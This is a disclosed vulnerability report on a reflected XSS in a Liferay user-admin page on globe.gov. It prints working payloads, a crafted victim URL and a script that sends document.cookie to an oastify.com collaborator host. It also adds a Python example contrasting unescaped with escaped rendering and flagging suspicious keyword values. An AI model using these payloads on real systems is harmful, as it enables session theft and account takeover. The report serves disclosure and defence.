Reflected XSS can lead to Account Takeover

Disclosed by
Zer0_bugs
Summary by Zer0_bugs

Reflected Cross-Site Scripting (Non-self)
Overview of the Vulnerability

Reflected Cross-Site Scripting (XSS) is a type of injection attack in which malicious JavaScript supplied in a request is reflected back in the server's response, so that when a user opens the affected page the script executes in the user's browser. Reflected XSS is present on this domain, which allows an attacker to create a crafted URL that, when opened by a user, executes arbitrary JavaScript within that user's browser in the context of this domain.

When an attacker can control code that is executed within a user’s browser, they are able to carry out any actions that the user is able to perform, including accessing any of the user's data and modifying information within the user’s permissions. This can result in modification, deletion, or theft of data, including accessing or deleting files, or stealing session cookies which an attacker could use to hijack a user’s session.
Business Impact

Reflected XSS could lead to data theft through the attacker's ability to manipulate data via their access to the application, and to interact with other users, including performing further malicious actions that would appear to originate from a legitimate user. These malicious actions could also result in reputational damage for the business through the impact on customers' trust.
Steps to Reproduce

Go to the vulnerable URL: https://www.globe.gov/group/control_panel/manage?_com_liferay_users_admin_web_portlet_UsersAdminPortlet_keywords=vulnerable+url&p_p_mode=view&p_p_lifecycle=0&_com_liferay_users_admin_web_portlet_UsersAdminPortlet_toolbarItem=view-all-users&_com_liferay_users_admin_web_portlet_UsersAdminPortlet_orderByType=asc&_com_liferay_users_admin_web_portlet_UsersAdminPortlet_status=0&_com_liferay_users_admin_web_portlet_UsersAdminPortlet_keywords=hello&_com_liferay_users_admin_web_portlet_UsersAdminPortlet_usersListView=flat-users&p_p_state=maximized&p_p_id=com_liferay_users_admin_web_portlet_UsersAdminPortlet&refererPlid=70817193&_com_liferay_users_admin_web_portlet_UsersAdminPortlet_navigation=active&_com_liferay_users_admin_web_portlet_UsersAdminPortlet_saveUsersListView=true&_com_liferay_users_admin_web_portlet_UsersAdminPortlet_orderByCol=firstName&_com_liferay_users_admin_web_portlet_UsersAdminPortlet_userGroupId=332470 (the attacker should be logged in to their own account)
After visiting the URL, place the following payload in the keywords parameter of the URL. Payload: hello"</span></span></div></li></ul></nav><body src=https://burpcolab_link onload=this+alert(document.cookie)>
The payload above can be used to steal the victim's cookies.
The final URL looks like this: https://www.globe.gov/group/control_panel/manage?_com_liferay_users_admin_web_portlet_UsersAdminPortlet_keywords=hello%22%3C%2Fspan%3E%3C%2Fspan%3E%3C%2Fdiv%3E%3C%2Fli%3E%3C%2Ful%3E%3C%2Fnav%3E%3Cbody+src%3Dhttps%3A%2F%2Fjcz1qduie3i7dryvdjw28uuwbnhe56tv.oastify.com+onload%3Dthis%2Balert%28document.cookie%29%3E&p_p_mode=view&p_p_lifecycle=0&_com_liferay_users_admin_web_portlet_UsersAdminPortlet_toolbarItem=view-all-users&_com_liferay_users_admin_web_portlet_UsersAdminPortlet_orderByType=asc&_com_liferay_users_admin_web_portlet_UsersAdminPortlet_status=0&_com_liferay_users_admin_web_portlet_UsersAdminPortlet_keywords=hello&_com_liferay_users_admin_web_portlet_UsersAdminPortlet_usersListView=flat-users&p_p_state=maximized&p_p_id=com_liferay_users_admin_web_portlet_UsersAdminPortlet&refererPlid=70817193&_com_liferay_users_admin_web_portlet_UsersAdminPortlet_navigation=active&_com_liferay_users_admin_web_portlet_UsersAdminPortlet_saveUsersListView=true&_com_liferay_users_admin_web_portlet_UsersAdminPortlet_orderByCol=firstName&_com_liferay_users_admin_web_portlet_UsersAdminPortlet_userGroupId=332470
Send it to the victim (this payload only works if the victim has an active session for their account in the browser that opens the link).
The payload executes in the victim's browser, and the victim's cookies are also sent to the attacker's Burp Suite instance.
Observe the JavaScript payload being executed.
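
The root cause, from the defender's side: the value of the `_com_liferay_users_admin_web_portlet_UsersAdminPortlet_keywords` parameter is written into the page without HTML encoding, so a `"` or `<` in it closes the surrounding markup. The following is an added example, not code from the report or from Liferay: it shows the unsafe reflection beside the entity-encoded form, and a check that decodes a request URL's query string and flags keywords values carrying HTML metacharacters. The `TEMPLATE` markup is a constructed stand-in for the real page template, and `REPORT_URL` is the report's final URL with most parameters trimmed.

```python
import html
from urllib.parse import urlsplit, parse_qs

# Constructed stand-in for the markup that echoes the search term back;
# the real Liferay template is not reproduced here.
TEMPLATE = '<span class="search-term">{kw}</span>'

KEYWORDS_PARAM = "_com_liferay_users_admin_web_portlet_UsersAdminPortlet_keywords"


def render_unsafe(keyword: str) -> str:
    """Vulnerable pattern: the raw value is concatenated into the HTML,
    so a '"' or '<' inside it is parsed as markup rather than text."""
    return TEMPLATE.format(kw=keyword)


def render_safe(keyword: str) -> str:
    """Hardened pattern: entity-encode the value for an HTML text/attribute
    context, so <, >, &, " and ' are rendered literally."""
    return TEMPLATE.format(kw=html.escape(keyword, quote=True))


def contains_markup(value: str) -> bool:
    """True if the decoded value could open or close a tag or attribute."""
    return any(ch in value for ch in '<>"\'')


def flag_request(url: str) -> list[str]:
    """Decode the query string and return every keywords value that carries
    HTML metacharacters; an empty list means nothing suspicious."""
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return [v for v in qs.get(KEYWORDS_PARAM, []) if contains_markup(v)]


# The report's final URL, trimmed to the two keywords parameters and one
# unrelated parameter; the encoding is exactly as it appears in the report.
REPORT_URL = (
    "https://www.globe.gov/group/control_panel/manage?"
    + KEYWORDS_PARAM + "=hello%22%3C%2Fspan%3E%3C%2Fspan%3E%3C%2Fdiv%3E%3C%2Fli%3E"
    "%3C%2Ful%3E%3C%2Fnav%3E%3Cbody+src%3Dhttps%3A%2F%2Fjcz1qduie3i7dryvdjw28uuwbnhe56tv"
    ".oastify.com+onload%3Dthis%2Balert%28document.cookie%29%3E"
    "&p_p_mode=view&" + KEYWORDS_PARAM + "=hello"
)

if __name__ == "__main__":
    for hit in flag_request(REPORT_URL):
        print("flagged keywords value:", hit)
        print("unsafe render :", render_unsafe(hit))
        print("safe render   :", render_safe(hit))
```

Run against the report's URL, only the first keywords value is flagged (the second, `hello`, is clean), and the safe rendering turns the closing tags into `&lt;/span&gt;...` text that the browser displays instead of parsing.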

Proof of Concept (PoC)

Below is a screenshot demonstrating the injected JavaScript executing at the vulnerable endpoint:
Normal payload (screenshot):
Payload: hello"</span></span></div></li></ul></nav><script> alert('REFLECTED XSS FOUND')</script>

Payload to steal cookies (screenshot):
This XSS vulnerability could be further abused by using the following JavaScript payload:
hello"</span></span></div></li></ul></nav><script> alert(document.cookie); var i=new Image; i.src="https://yjlgxs1xlipmk65aky3hf91bi2otcm0b.oastify.com/?"+document.cookie; </script>

Here is a screenshot of the full exploit taking place:

(screenshot)

The victim's cookies were successfully captured using Burp Suite.
